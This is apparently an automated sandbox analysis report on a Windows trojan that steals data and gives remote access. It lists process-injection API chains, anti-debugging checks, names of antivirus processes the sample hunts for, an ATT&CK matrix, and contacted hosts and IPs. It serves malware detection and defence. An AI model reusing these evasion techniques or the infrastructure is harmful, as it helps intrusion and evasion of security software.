                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7412Thread sleep time: -5011000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96098C0 GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,lstrcpyW,lstrcpyW,lstrcatW,0_2_000001CFB96098C0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96089F0 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_000001CFB96089F0
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB74F5000.00000004.00000020.00020000.00000000.sdmp, 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB747C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeAPI call chain: ExitProcess graph end nodegraph_0-32664
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96149D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000001CFB96149D8
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608A70 LoadLibraryW,GetProcAddress,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,0_2_000001CFB9608A70
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9607BF0 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,0_2_000001CFB9607BF0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96107A0 Sleep,SleepEx,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,RegOpenKeyExW,Sleep,SleepEx,RegOpenKeyExW,RegQueryValueExW,Sleep,WaitForSingleObject,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,0_2_000001CFB96107A0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96149D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000001CFB96149D8
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96118A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000001CFB96118A0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_00007FF6F6085050 SetUnhandledExceptionFilter,0_2_00007FF6F6085050
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_00007FF6F6084118 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6F6084118
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_00007FF6F60842F8 SetUnhandledExceptionFilter,0_2_00007FF6F60842F8

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96095B0 GetSystemDirectoryA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,0_2_000001CFB96095B0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608E20 GetSystemDirectoryA,CreateProcessA,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,GetModuleFileNameA,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,ResumeThread,0_2_000001CFB9608E20
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeNtUnmapViewOfSection: Indirect: 0x1CFB9313B24Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeNtMapViewOfSection: Indirect: 0x1CFB9313B90Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeNtMapViewOfSection: Indirect: 0x1CFB9313653Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: GetSystemDirectoryA,CreateProcessA,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,GetModuleFileNameA,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe0_2_000001CFB9608E20
                    Source: 2IVWAPeiZm.exe, 00000000.00000002.4113072764.000001CFBA030000.00000004.00000020.00020000.00000000.sdmp, 2IVWAPeiZm.exe, 00000000.00000002.4113444705.000001CFBA432000.00000004.00000020.00020000.00000000.sdmp, 2IVWAPeiZm.exe, 00000000.00000003.3181505839.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: 2IVWAPeiZm.exe, 00000000.00000003.1797753089.000001CFBA0E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                    Source: 2IVWAPeiZm.exe, 00000000.00000003.3900337582.000001CFBA070000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .2.4 0 min724536Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                    Source: 2IVWAPeiZm.exe, 00000000.00000003.3349240156.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, 2IVWAPeiZm.exe, 00000000.00000003.1797698380.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, 2IVWAPeiZm.exe, 00000000.00000003.3368874986.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .2.4 0 min724536Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: gethostname,gethostbyname,inet_ntoa,inet_ntoa,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,GetTickCount,_localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,0_2_000001CFB96067B0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: GetLocaleInfoW,0_2_000001CFB9626190
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96107A0 Sleep,SleepEx,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,RegOpenKeyExW,Sleep,SleepEx,RegOpenKeyExW,RegQueryValueExW,Sleep,WaitForSingleObject,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,0_2_000001CFB96107A0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96188E0 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_000001CFB96188E0
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96142A8 HeapCreate,GetVersion,HeapSetInformation,0_2_000001CFB96142A8
                    Source: 2IVWAPeiZm.exeBinary or memory string: acs.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: kxetray.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: avcenter.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: vsserv.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: KSafeTray.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: cfp.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: avp.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: 360Safe.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: 360tray.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: rtvscan.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: ashDisp.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: TMBMSRV.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: 360Tray.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: avgwdsvc.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: AYAgent.aye
                    Source: 2IVWAPeiZm.exeBinary or memory string: RavMonD.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: QUHLPSVC.EXE
                    Source: 2IVWAPeiZm.exeBinary or memory string: Mcshield.exe
                    Source: 2IVWAPeiZm.exeBinary or memory string: K7TSecurity.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba34ac51.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb925162d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba0e5bd1.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb924647d.50.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.21.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba385181.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba432c61.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.42.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.26.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.39.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.28.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.38.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb923b8cd.32.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.36.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.36.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba3f91b5.52.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.28.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb92413ed.41.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb925162d.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba0e5bd1.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.46.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.48.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.33.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb92170ad.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb95b06d1.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.23.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.26.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.49.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba432c61.53.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.44.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.29.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.45.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba3f91b5.52.unpack, type: UNPACKEDPE

                    Remote Access Functionality

                    Source: Yara matchFile source: 00000000.00000003.3535968647.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1925169796.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3181469055.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2107170872.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2629153864.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3368840828.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2107104468.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3368874986.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3181505839.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4113319605.000001CFBA310000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 2IVWAPeiZm.exe PID: 7272, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 11 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Abuse Elevation Control Mechanism | 121 Input Capture | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Obfuscated Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Access Token Manipulation | 1 Software Packing | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 121 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 211 Process Injection | 1 DLL Side-Loading | NTDS | 16 System Information Discovery | Distributed Component Object Model | 2 Clipboard Data | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 1 Query Registry | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 31 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 211 Process Injection | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Indicator Removal | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

Source | Detection | Scanner | Label
2IVWAPeiZm.exe | 58% | ReversingLabs | Win64.Trojan.CrypterX
2IVWAPeiZm.exe | 60% | Virustotal |
2IVWAPeiZm.exe | 100% | Avira | HEUR/AGEN.1317284
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
gz.file.myqcloud.com | 0% | Virustotal |
Source | Detection | Scanner | Label
https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/ | 0% | Avira URL Cloud | safe
https://www.remobjects.com/ps | 0% | Avira URL Cloud | safe
https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/eX | 0% | Avira URL Cloud | safe
https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.pngvector | 0% | Avira URL Cloud | safe
http://www.wofficebox.com/ | 0% | Avira URL Cloud | safe
https://www.innosetup.com/ | 0% | Avira URL Cloud | safe
https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.png | 0% | Avira URL Cloud | safe
https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.png | 0% | Virustotal |
http://www.wofficebox.com/ | 0% | Virustotal |
https://www.remobjects.com/ps | 0% | Virustotal |
https://www.innosetup.com/ | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
gz.file.myqcloud.com | 159.75.57.35 | true | false | | unknown
pattern-1326658104.cos.ap-guangzhou.myqcloud.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.png | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/eX | 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB747C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wofficebox.com/ | 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/ | 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB747C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.pngvector | 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://www.remobjects.com/ps | 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://www.innosetup.com/ | 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
206.238.115.146 | unknown | United States | 174 | COGENT-174US | true
159.75.57.35 | gz.file.myqcloud.com | China | 1257 | TELE2EU | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467970
Start date and time: 2024-07-05 07:32:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 2IVWAPeiZm.exe (renamed because the original name is a hash value)
Original Sample Name: 06592a8ca068935d98a5ada152e3393d.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/2@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 66
• Number of non-executed functions: 209
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:33:43 | API Interceptor | 5619166x Sleep call for process: 2IVWAPeiZm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
159.75.57.35 | #U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
gz.file.myqcloud.com | #U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe | malicious | Unknown | 159.75.57.36
gz.file.myqcloud.com | #U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe | malicious | Unknown | 159.75.57.35
gz.file.myqcloud.com | dllhostpgd.exe | malicious | CobaltStrike | 159.75.57.69
gz.file.myqcloud.com | dllhostpgd.exe | malicious | CobaltStrike | 159.75.57.69
gz.file.myqcloud.com | buding.exe | malicious | Unknown | 159.75.57.69
gz.file.myqcloud.com | Q6UkPxz1Bk.exe | malicious | Unknown | 159.75.57.69
gz.file.myqcloud.com | Q6UkPxz1Bk.exe | malicious | Unknown | 159.75.57.69
gz.file.myqcloud.com | #U8d85#U7ea7#U6587#U672cTXT.exe | malicious | AsyncRAT, DcRat, VenomRAT | 159.75.57.36
gz.file.myqcloud.com | HZ8Y6MTW1L.exe | malicious | Unknown | 159.75.57.69
gz.file.myqcloud.com | https://fxx922022webapps930-1312962597.cos.ap-guangzhou.myqcloud.com/fx.htm#junruh@greendotcorp.com | malicious | Unknown | 159.75.57.36
Match | Associated Sample Name / URL | Detection | Threat Name | Context
COGENT-174US | PTT Group project - Quotation.exe | malicious | FormBook | 38.47.232.224
COGENT-174US | adobe_scanner12.exe | malicious | FormBook | 38.47.232.185
COGENT-174US | ScanPDF_102.exe | malicious | FormBook | 38.55.194.30
COGENT-174US | https://nmg.evlink21.net/ | malicious | Unknown | 154.59.122.79
COGENT-174US | 205.185.124.50-arm-2024-07-03T23_47_53.elf | malicious | Mirai, Moobot | 154.39.121.31
COGENT-174US | 205.185.124.50-x86-2024-07-03T23_47_55.elf | malicious | Mirai, Moobot | 154.42.40.250
COGENT-174US | CMgd5ZVG2N.elf | malicious | Unknown | 38.245.242.130
COGENT-174US | qS7rA9kvqg.elf | malicious | Unknown | 160.238.102.21
COGENT-174US | PMcyGpR57k.elf | malicious | Unknown | 38.210.131.180
COGENT-174US | buPdHWwrzF.elf | malicious | Unknown | 38.14.1.248
TELE2EU | q9WhhN00yY.elf | malicious | Unknown | 90.130.240.6
TELE2EU | jew.arm.elf | malicious | Unknown | 37.198.247.136
TELE2EU | lQC7IiMNX1.elf | malicious | Mirai | 193.234.24.255
TELE2EU | 2T9ShVKj85.elf | malicious | Mirai | 90.139.46.165
TELE2EU | h1dNV0rAcX.elf | malicious | Mirai | 83.184.232.22
TELE2EU | AAMwAy8pB7.elf | malicious | Mirai, Moobot | 37.2.41.226
TELE2EU | BNd5XPrLzR.elf | malicious | Mirai, Moobot | 159.72.219.22
TELE2EU | BviOG97ArX.elf | malicious | Mirai, Moobot | 90.133.104.26
TELE2EU | grxpiPs2Fw.elf | malicious | Mirai, Moobot | 83.183.88.85
TELE2EU | pk5zYdkgga.elf | malicious | Mirai, Moobot | 193.217.123.228
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | poMkNYHDU3.exe | malicious | Remcos | 159.75.57.35
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.FileRepMalware.1111.23697.exe | malicious | Unknown | 159.75.57.35
37f463bf4616ecd445d4a1937da06e19 | lem.exe | malicious | Vidar | 159.75.57.35
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 159.75.57.35
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Babuk, Djvu | 159.75.57.35
37f463bf4616ecd445d4a1937da06e19 | 5gO02Ijl9V.exe | malicious | GuLoader | 159.75.57.35
37f463bf4616ecd445d4a1937da06e19 | ooXgr5BYnA.exe | malicious | GuLoader, Lokibot | 159.75.57.35
37f463bf4616ecd445d4a1937da06e19 | 7Bkd5ILk1o.exe | malicious | GuLoader, Lokibot | 159.75.57.35
37f463bf4616ecd445d4a1937da06e19 | oFNtjcXGVB.exe | malicious | FormBook, GuLoader | 159.75.57.35
